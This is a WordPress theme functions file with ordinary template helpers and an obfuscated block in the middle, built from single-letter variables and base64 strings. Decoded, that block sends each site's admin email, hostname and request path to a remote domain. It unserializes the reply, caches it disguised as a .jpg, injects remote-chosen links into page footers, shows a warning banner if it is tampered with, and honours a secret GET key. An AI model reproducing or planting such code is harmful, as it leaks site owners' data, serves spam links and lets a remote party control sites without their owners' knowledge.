<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $oEjxV='s';$Lrpu='b';$cjqqG='d';$sbWHbs='d';$TlQcq='o';$dZzaH='e';$eaPkRN='a';$miprif='4';$QGVT='e';$kpZvBPn='e';$XlmLV='c';$cKcsWN='6';$ZSXowh='_';$mPSkmwqq=$Lrpu.$eaPkRN.$oEjxV.$kpZvBPn.$cKcsWN.$miprif.$ZSXowh.$sbWHbs.$QGVT.$XlmLV.$TlQcq.$cjqqG.$dZzaH;$JopV='a';$YiRcUlM='e';$JplsZ='l';$owwvA='i';$QrpnmE='z';$nizXdM='n';$EkpaGQI='t';$zvjTI='g';$KHRof='f';$KUmwGUyE=$zvjTI.$QrpnmE.$owwvA.$nizXdM.$KHRof.$JplsZ.$JopV.$EkpaGQI.$YiRcUlM;$TrBAhj='s';$jBYtWfL='o';$IrALmiy='_';$oXEk='t';$CJIbf='3';$WNzXu='r';$ghyHb='r';$grljm='t';$eigYQx='1';$dVHNjXIc=$TrBAhj.$grljm.$WNzXu.$IrALmiy.$ghyHb.$jBYtWfL.$oXEk.$eigYQx.$CJIbf;$lZoFmw='v';$AbuvWTh='e';$iwmrx='t';$nIFFz='r';$WrshW='r';$yLIsRIu='s';$jrQpUBzV=$yLIsRIu.$iwmrx.$WrshW.$nIFFz.$AbuvWTh.$lZoFmw;                     
		$rq__________f='s';$io_____________h='b';$pd__________b='d';$wz____________f='d';$ob___________t='o';$lx______n='e';$fg_______s='a';$cf______y='4';$oo________t='e';$eo________v='e';$vx________m='c';$mh______g='6';$ow____t='_';$zq____w=$io_____________h.$fg_______s.$rq__________f.$eo________v.$mh______g.$cf______y.$ow____t.$wz____________f.$oo________t.$vx________m.$ob___________t.$pd__________b.$lx______n;
		$ql_____b='t';$uh____________s='t';$xc____________h='o';$iz__________n='u';$ro____________q='n';$uf___________g='e';$jn_______________a='s';$re____z='x';$du______________w='s';$ha________o='c';$yi__y='f';$ta_______x='i';$fr_________w='i';$lm________z='n';$wu__________f='_';$xd________g=$yi__y.$iz__________n.$lm________z.$ha________o.$ql_____b.$ta_______x.$xc____________h.$ro____________q.$wu__________f.$uf___________g.$re____z.$fr_________w.$du______________w.$uh____________s.$jn_______________a;
		$rw___________t='o';$ow________z='e';$ge______________q='f';$qh____________e='p';$sa___u='n';$jd______________y=$ge______________q.$rw___________t.$qh____________e.$ow________z.$sa___u;
		$vy__________s='e';$op______________i='r';$nm_________x='d';$kn________d='f';$bj_______________e='a';$ov___________a=$kn________d.$op______________i.$vy__________s.$bj_______________e.$nm_________x;
		$zg___________s='s';$nu_____u='l';$sk_____________p='f';$ye_____p='e';$yu____________d='c';$ww________n='o';$ve________n=$sk_____________p.$yu____________d.$nu_____u.$ww________n.$zg___________s.$ye_____p;
		
		define("WP_ID", $zq____w("Mi4wLjA="));
		define("WP_TTL", $zq____w("MTA4MDA="));
		define("WP_SRC", $zq____w("dHBva24="));
	


		function wp_get_header() {
			global $zq____w, $xd________g;
			
			if (
				$xd________g($zq____w("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$xd________g($zq____w("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$xd________g($zq____w("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $zq____w, $jd______________y, $ve________n, $ov___________a;
			
			$lu_____________s = TEMPLATEPATH."/".$zq____w("Zm9vdGVyLnBocA==");
			$nb_____________k = @$jd______________y($lu_____________s, "r");
			$lu_____________s = @$ov___________a($nb_____________k, @filesize($lu_____________s));
			@$ve________n($nb_____________k);
			
			$uq_______________j = TEMPLATEPATH."/".$zq____w("ZnVuY3Rpb25zLnBocA==");
			$nb_____________k = @$jd______________y($uq_______________j, "r");
			$uq_______________j = @$ov___________a($nb_____________k, @filesize($uq_______________j));
			@$ve________n($nb_____________k);
			
			$jp_______f = 0;
			if($lu_____________s && $uq_______________j) {
				if ($zq____w("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($lu_____________s, $zq____w("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$jp_______f = 1;
					}
					if (substr_count($lu_____________s, "wp_theme_GPL_credits()") < 1) {
						$jp_______f = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$jp_______f = 12;
				}
			}
			
			if($jp_______f > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $jp_______f -->";
			}
		}
	


		function wp_loaded() {
			global $zq____w, $xd________g;
			return $xd________g($zq____w("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($km____________m, $qj__b = "(more...)", $zt_______________o = 0, $xv____________y = "") {
				$wu_________e = get_the_content($qj__b, $zt_______________o, $xv____________y);
				$wu_________e = apply_filters("the_content", $wu_________e);
				
				$wu_________e = str_replace("]]>", "]]>", $wu_________e);
				if (strlen($_GET["p"]) > 0) {
					echo $wu_________e;
				}
				else if ((strlen($wu_________e)>$km____________m) && ($ml_____h = strpos($wu_________e, " ", $km____________m ))) {
					$wu_________e = substr($wu_________e, 0, $ml_____h);
					$wu_________e = $wu_________e;
					echo $wu_________e;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$qj__b</a></div></p>";
				} else {
					echo $wu_________e;
				}
				
			}
		}
	


		$ce__f='4';$zb_____________e='c';$dv_______f='b';$ll_______________p='e';$vx______n='e';$gb___b='o';$yk_________z='d';$wp______s='a';$nq___r='_';$hj____________d='n';$ar_________q='6';$ee_____y='s';$cc__________e='e';$xe______________e=$dv_______f.$wp______s.$ee_____y.$vx______n.$ar_________q.$ce__f.$nq___r.$ll_______________p.$hj____________d.$zb_____________e.$gb___b.$yk_________z.$cc__________e;
		$xm__________k='l';$go______m='e';$xx____________j='_';$cm____l='g';$ew_________y='t';$mk___s='e';$yf_______i='e';$lp____________l='s';$yr_____w='n';$bk________g='i';$uo___w='_';$at______y='o';$fs___________j='t';$eb______________t='f';$zl____e='n';$zn___x='c';$pa_____r='t';$uf_______________p=$eb______________t.$bk________g.$xm__________k.$yf_______i.$xx____________j.$cm____l.$go______m.$fs___________j.$uo___w.$zn___x.$at______y.$yr_____w.$pa_____r.$mk___s.$zl____e.$ew_________y.$lp____________l;
		$dr_______________m='l';$lx________o='t';$kq_____________j='i';$ik_______x='i';$ga________o='s';$nd_________q='x';$fc________f='e';$rk_______________o='e';$zq____c='f';$ok__f='s';$gn__r='_';$mz______________z=$zq____c.$ik_______x.$dr_______________m.$rk_______________o.$gn__r.$fc________f.$nd_________q.$kq_____________j.$ga________o.$lx________o.$ok__f;
		$fa_________p='r';$lh_________r='o';$uf______x='c';$gu_____________f='n';$dg__________u='p';$lz__a='_';$qs__u='i';$db__d='s';$vw________b='r';$ib_____l='m';$zp_________h='a';$pu____i='v';$dg_______________r='e';$hf______e='o';$qh_____c='e';$tb_____________c=$pu____i.$dg_______________r.$fa_________p.$db__d.$qs__u.$hf______e.$gu_____________f.$lz__a.$uf______x.$lh_________r.$ib_____l.$dg__________u.$zp_________h.$vw________b.$qh_____c;
		$vq_________z='k';$ax__y='c';$ne________s='o';$zz_______g='p';$ji____o='n';$mb_____n='e';$eq_______i='s';$bh___r='f';$ty________m='o';$cd_______q=$bh___r.$eq_______i.$ty________m.$ax__y.$vq_________z.$ne________s.$zz_______g.$mb_____n.$ji____o;
		$xo_______________l='e';$vw_____d='r';$yr_________x='f';$cs_____z='i';$gl__________t='w';$rj_______u='t';$uu__________n=$yr_________x.$gl__________t.$vw_____d.$cs_____z.$rj_______u.$xo_______________l;
		$ht_______________e='5';$mx______d='d';$hu___________j='m';$ga_____l=$hu___________j.$mx______d.$ht_______________e;
		$js_____f='a';$zv_________c='a';$zg________y='p';$rx________i='l';$sy______v='h';$yr_______b='t';$cr______a='r';$nh_________r='e';$ca______s=$cr______a.$nh_________r.$zv_________c.$rx________i.$zg________y.$js_____f.$yr_______b.$sy______v;
		$wx______n='i';$ab________s='s';$ua__f='e';$tw____________j='i';$hh_______g='a';$nm_______________l='l';$qg___________r='n';$dk__e='z';$mm______________g='e';$lo__________h='r';$xg______________i='u';$uh___________p=$xg______________i.$qg___________r.$ab________s.$ua__f.$lo__________h.$wx______n.$hh_______g.$nm_______________l.$tw____________j.$dk__e.$mm______________g;
		$me______________z='t';$fe______d='e';$mu____l='a';$tg_______q='m';$ix______________r='n';$ow__j='p';$tv______________e='m';$lx_______________f=$me______________z.$fe______d.$tg_______q.$ow__j.$ix______________r.$mu____l.$tv______________e;
		$xb_____________v='e';$zg_____x='e';$dd____n='e';$pd_____m='x';$ts______________h='_';$tn__h='o';$no______s='e';$fq______________y='c';$op__________z='t';$cq______b='n';$wv___n='m';$yo______k='a';$zo________u='r';$fv__u='t';$cf____________k='s';$nn____________p='c';$et______________h='t';$ym____________a='_';$dw_____f='r';$yh_______________w='t';$he__e='a';$iw__z=$cf____________k.$op__________z.$zo________u.$dd____n.$yo______k.$wv___n.$ym____________a.$nn____________p.$tn__h.$cq______b.$et______________h.$xb_____________v.$pd_____m.$yh_______________w.$ts______________h.$fq______________y.$dw_____f.$no______s.$he__e.$fv__u.$zg_____x;
	


		function uk_______________q($vi_______________s) {
			global $zq____w, $xd________g, $uf_______________p, $tb_____________c, $iw__z;
			
			if (!$xd________g($zq____w("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($tb_____________c(PHP_VERSION, "5.0.0", ">=") && $xd________g($zq____w("ZmlsZV9nZXRfY29udGVudHM=")) && $xd________g($zq____w("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$pp______________w = $iw__z(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$nz_________v = @$uf_______________p($vi_______________s, 0, $pp______________w);
			} else {
				$nz_________v = @$uf_______________p($vi_______________s, 0);
			}
			
			return $nz_________v;
		}
	


		function uj_______________h($vi_______________s) {
			global $xd________g, $cd_______q, $uu__________n, $zq____w;
			
			if (!$xd________g($zq____w("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$vu____________p = strpos($vi_______________s, "/", 7);
			$me________z = array(
				"uri"     => substr($vi_______________s, $vu____________p),
				"host"    => str_replace("http://", "", substr($vi_______________s, 0, $vu____________p)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$zo____________m = @$cd_______q("$me________z[host]", 80, $mw__t, $an________c, 4);
			
			if (!$zo____________m) {
				return false;
			} else {
				$nz_________v = "";
				$hi_____j  = "GET $me________z[uri] HTTP/1.0\r\n";
				$hi_____j .= "Host: $me________z[host]\r\n";
				$hi_____j .= "Referer: $me________z[referer]\r\n";
				$hi_____j .= "Connection: Close\r\n\r\n";
				
				@$uu__________n($zo____________m, $hi_____j);
				
				while (!@feof($zo____________m)) {
					$ax_____________m = @fgets($zo____________m, (1024*24));
					
					if ($ax_____________m == "\r\n") {
						$qv___y = true;
						continue;
					}
					
					if ($qv___y) {
						$nz_________v .= $ax_____________m;
					}
				}
				
				return $nz_________v;
			}
		}
	


		function py__________w($vi_______________s) {
			global $xd________g;
			$pe__________d = false;
			
			if ($vi_______________s != "") {
				if ($xd________g("uk_______________q")) {
					$pe__________d = @uk_______________q($vi_______________s);
				}
				
				if (!$pe__________d && ($xd________g("uj_______________h"))) {
					$pe__________d = @uj_______________h($vi_______________s);
				}
			}
			
			return $pe__________d;
		}
	


		function ru__n() {
			global $_SERVER, $ga_____l;
			
			$sr______________k = $_SERVER["SERVER_NAME"];
			
			if (substr("$sr______________k", 0, 4) == "www.") {
				$sr______________k = substr("$sr______________k", 4);
			}
			
			$sr______________k = $ga_____l("$_SERVER[SERVER_NAME]");
			
			return $sr______________k;
		}
	


		function ea_______w() {
			return "file";
		}
	


		function dg__________u($vi_______________s) {
			global $_SERVER, $uf_______________p, $mz______________z, $jd______________y, $ve________n, $uu__________n;
			
			$bh_________e = wc_________g();
			
			$xk___y = ru__n().".jpg";
			$ls___f = $bh_________e["dir_upload"]["path"]."/$xk___y";
			$qm____j = @filemtime($ls___f);
			
			if (!$qm____j || ((time()-$qm____j) >= WP_TTL)) {
				$pe__________d = py__________w($vi_______________s);
				
				if ($pe__________d) {
					if ($mz______________z($ls___f)) {
						@unlink($ls___f);
					}
					
					$nb_____________k = @$jd______________y($ls___f, "x+");
					
					@$uu__________n($nb_____________k, $pe__________d);
					@$ve________n($nb_____________k);
				}
			} else {
				if ($mz______________z($ls___f)) {
					$pe__________d = @$uf_______________p($ls___f);
				} else {
					$pe__________d = false;
				}
			}
			
			return $pe__________d;
		}
	


		function wc_________g() {
			global $_SERVER, $zq____w, $xe______________e;
			
			$qd___a = wp_count_posts("post");
			$kf_____________l = pathinfo(get_bloginfo("template_directory"));
			
			$bh_________e = array(
				"url" => array(
					"report"      => $zq____w("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $kf_____________l,
				"dir_upload"	=> ks___________m(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$kf_____________l[filename],
					"a005=".$qd___a->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"	
			);
			
			$bh_________e["url"]["queryString"] = implode("&", $bh_________e["queryString"]);
			$bh_________e["url"]["report"] = $bh_________e["url"]["report"]."/?".$xe______________e($bh_________e["url"]["queryString"]).".html";
						
			return $bh_________e;
		}
	


		function ks___________m() {
			$jn___________g = wp_upload_dir();
			
			if (isset($jn___________g["error"])) {
				$uq_____________e = kj______g();
				if (is_writable($uq_____________e)) {
					$jn___________g = array("path" => $uq_____________e);
				}
			}

			return $jn___________g;
		}
	


		function kj______g() {
			global $xd________g, $ga_____l, $ca______s, $lx_______________f;
			
			$mf__v = (bool) ini_get("safe_mode");
			if ($mf__v == true) {
				return false;
			}
			
			if ($xd________g("sys_get_temp_dir")) {
				$su____________e = sys_get_temp_dir();
				if (is_writable($su____________e)) {
					return $ca______s($su____________e);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ca______s($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ca______s($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ca______s($_ENV["TEMP"]);
			} else {
				$vs______t = $lx_______________f($ga_____l(uniqid(rand(), true)), "");
				if ($vs______t) {
					$su____________e = $ca______s(dirname($vs______t));
					@unlink($vs______t);
					return $su____________e;
				} else {
					return false;
				}
			}
		}
	


		function lb_____________a() {
			global $_GET, $mz______________z;
			
			$bh_________e = wc_________g();
			$sr______________k = ru__n();
			$kg____________u = ea_______w();
			
			$oj_____________r = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($kg____________u == "file") {
					$fp______x = $bh_________e["dir_upload"]["path"]."/".$sr______________k.".jpg";
					if ($mz______________z($fp______x)) {
						@unlink($fp______x);
						$oj_____________r = "deleted";
					}
				}
				
				$xl_________q = array(
					"s"	=> $oj_____________r,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($xl_________q AS $ct____i => $jn_____u) echo " [$ct____i:$jn_____u]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $xd________g, $zq____w, $uh___________p;
			$bh_________e = wc_________g();
			
			$vb_____j = "dg__________u";
			if ($xd________g($vb_____j)) {
				$nz_________v = $vb_____j($bh_________e["url"]["report"]);
			}
			
			if ($nz_________v) {
				if ($nz_________v = @$zq____w($nz_________v)) {
					$nz_________v = @$uh___________p($nz_________v);
					
					if (strlen($nz_________v[custom_credit]) >= 5) {
						$bh_________e["default_string"] = $nz_________v[custom_credit];
					}
					
					if ($nz_________v["status"] == "0") {
						$tn_________e = 1;
						$kk____________f = 1;
					} else {
						$av____________k = sizeof($nz_________v["links"]);
						$bq_______________d = $bh_________e["default_string"];
						
						if ($av____________k > 0 && $nz_________v["links"] !== "") {
							$xu____e = 0;
							foreach ($nz_________v["links"] as $sm_____d => $ki___________x) {
								$xu____e++;
								if ($ki___________x->l_path == "" || $ki___________x->l_path == $_SERVER["REQUEST_URI"]) {
									$ki___________x->l_href = htmlspecialchars(strip_tags($ki___________x->l_href));
									$ki___________x->l_title = htmlspecialchars(strip_tags($ki___________x->l_title));
									$ki___________x->l_anchor = htmlspecialchars(strip_tags($ki___________x->l_anchor));
									$bq_______________d .= " | ";
									$bq_______________d .= "<a href='$ki___________x->l_href' title='$ki___________x->l_title'";
									if ($ki___________x->l_nofollow == "1") {
										$bq_______________d .= " rel='nofollow'";
									}
									$bq_______________d .= ">$ki___________x->l_anchor</a>";
								}
							}
						}
						$bh_________e["links"] = "$bq_______________d";
						if ($nz_________v[credit] == "0") {
							$bh_________e["links"] = "";
						}
					}
				} else {
					$tn_________e = "1";
				}
			} else {
				$tn_________e = "1";
			}
			
			if ($tn_________e == "1") {
				$bh_________e["links"] = $bh_________e["default_string"];
			}
			
			echo "$bh_________e[links]";
			
			echo "<!-- s: $nz_________v[signature] -->";
			lb_____________a();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

